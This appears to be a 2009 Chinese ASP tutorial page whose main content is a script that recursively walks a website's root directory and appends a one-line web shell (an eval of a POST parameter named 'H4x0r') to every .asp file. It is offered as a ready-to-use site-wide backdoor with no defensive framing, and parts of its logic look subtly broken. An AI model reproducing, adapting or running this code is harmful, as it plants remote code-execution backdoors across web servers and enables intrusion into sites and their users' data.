当前位置: 首页 > 图文教程 > 网络编程 > ASP > FSO遍历目录实现全站插马的代码

ASP
无限级分类
ASP漏洞全接触-高级篇
ASP漏洞全接触-入门篇
调试ASP脚本
ASP编程经典例子
ASP技术访问WEB数据库
ASP中巧用Response属性
用ISAPIfilter使INC、ASA文件安全
浅析COM的思想及原理(1)
浅析COM的思想及原理(2)
浅析COM的思想及原理(3)
比较ADO与ODBC的区别
asp提供在线文章翻译的功能
关于文摘插件提交表单的开发
Access通用-自动替换数据库中的字符串
复选框用法
1小时ASP入门
显示目录下所有的文件(含文件夹)
[漏洞]利用Activer server explorer可对文件进行读写访问
给你的FSO对象加把锁

ASP 中的 FSO遍历目录实现全站插马的代码


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-13   浏览: 223 ::
收藏到网摘: n/a

<%
dim ph
dim intfile
server.ScriptTimeout = 600
ph=server.mappath("/")
Sub InsertAllFiles(Path)
Set FSO = CreateObject("Scripting.FileSystemObject")
on error resume next
Set f = FSO.GetFolder(Path)
Set fc2 = f.files
For Each myfile in fc2
If lcase(FSO.GetExtensionName(path&""&myfile.name))="asp" then
Set FS1 = CreateObject("Scripting.FileSystemObject")
Set tfile=FS1.opentextfile(path&""&myfile.name,8,false)
tfile.writeline "<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('H4x0r')+'')</SCRIPT>"
else
InsertAllFiles(newpath)
end if
tfile.close
Next
Set fsubfolers = f.SubFolders
For Each f1 in fsubfolers
newpath=path&""&f1.name
InsertAllFiles(newpath)
Next
set tfile=nothing
Set FSO = Nothing
End Sub
%>
<%
call InsertAllFiles(ph)
%>